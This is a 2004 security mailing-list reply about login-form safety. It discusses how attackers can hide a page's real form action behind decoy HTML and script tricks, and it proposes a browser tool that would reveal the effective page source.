Re: Growing Bad Practice with Login Forms

[Steve <network.administrator () gmail com>]

On Tue, 27 Jul 2004 21:46:01 +0000 GMT, Jason Coombs PivX Solutions
<jcoombs () pivx com> wrote:
> > In that example as I mentioned it
> > is (I checked the HTML post location
> > and it was).
>
> You *think* you checked the post location...
>
> Have you not seen attackers who anticipate security-aware types scanning page source before "trusting" the page? It 
> is common now for decoy HTML to be placed at the top of the page, and for client-side scripting, formatting and 
> HTML/script comment tricks to be used to obscure and conceal the fact that the HTML you're looking at is not in fact 
> the HTML that the browser will interpret...
>
> You feel like you're smart enough to read any page source and understand it quickly, but you're not. Nobody is.
>
> Jason Coombs
> Jcoombs () PivX com

A sidetrack, but this sounds like an effective silver bullet
solution--I'm not aware of an application or browser plugin that shows
the _effective_ source for any page, or perhaps lets you select areas
of a page and see all the scripting that pertains to it, but there
must be one, if this problem exists.
Of course, this still wouldn't help the average user, but it would
provide an extra level of defense to someone willing to do a bit of
extra work.